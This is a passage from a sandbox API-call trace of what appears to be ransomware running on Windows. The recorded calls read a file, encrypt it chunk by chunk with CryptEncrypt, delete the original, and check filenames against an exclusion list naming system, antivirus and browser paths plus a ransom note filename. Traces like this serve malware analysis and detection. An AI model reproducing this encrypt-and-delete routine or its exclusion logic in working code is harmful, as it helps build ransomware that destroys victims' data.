files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.404] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2658) returned 1 [0147.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.405] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.436] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.436] GetLastError () returned 0x0 [0147.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.436] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.437] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.437] GetLastError () returned 0x0 [0147.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.437] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.437] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.437] GetLastError () returned 0x0 [0147.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.437] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.437] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.437] GetLastError () returned 0x0 [0147.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.437] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.437] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.437] GetLastError () returned 0x0 [0147.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.437] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.437] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.437] GetLastError () returned 0x0 [0147.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.437] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.437] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.437] GetLastError () returned 0x0 [0147.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.437] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.438] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.438] GetLastError () returned 0x0 [0147.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.438] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.438] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.438] GetLastError () returned 0x0 [0147.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.438] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.438] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.438] GetLastError () returned 0x0 [0147.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.438] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x62, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x62, lpOverlapped=0x0) returned 1 [0147.438] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x62, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0147.438] GetLastError () returned 0x0 [0147.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0147.438] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.438] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml")) returned 0x20 [0147.438] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml", dwFileAttributes=0x20) returned 0 [0147.439] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 1 [0147.439] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml")) returned 0 [0147.439] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" [0147.439] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.439] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB2CE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb2ce.tmp")) returned 0xb2ce [0147.440] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB2CE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb2ce.tmp"), dwFlags=0x1) returned 0 [0147.440] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB2CE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb2ce.tmp")) returned 1 [0147.440] CryptDestroyKey (hKey=0x9ad138) returned 1 [0147.440] wcslen (_String="OK") returned 0x2 [0147.440] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.440] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.440] CryptDestroyKey (hKey=0x9ad838) returned 1 [0147.440] CryptDestroyHash (hHash=0x9ad478) returned 1 [0147.440] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0147.440] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.440] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*NMCRYPT") returned 0 [0147.440] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*Recovers your files.html") returned 0 [0147.440] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*.exe") returned 0 [0147.440] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*.dll") returned 0 [0147.440] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*.lnk") returned 0 [0147.440] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*.bat") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*.ini") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*.msi") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*.scf") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*pagefile.sys*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*AppData*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*\\winrar\\*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*\\java\\*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*\\windows\\*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*\\ESET\\*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*\\AVG\\*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*Atheros*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*Realtek*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*bootmgr*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*boot*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*boot*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*IO.SYS*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*ntldr*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*chrome*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*opera*") returned 0 [0147.441] PathMatchSpecW (pszFile="ipsfra.xml", pszSpec="*firefox*") returned 0 [0147.441] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml", pszSpec="*") returned 1 [0147.441] strlen (_Str="NMoreira") returned 0x8 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.443] CryptGenRandom (in: 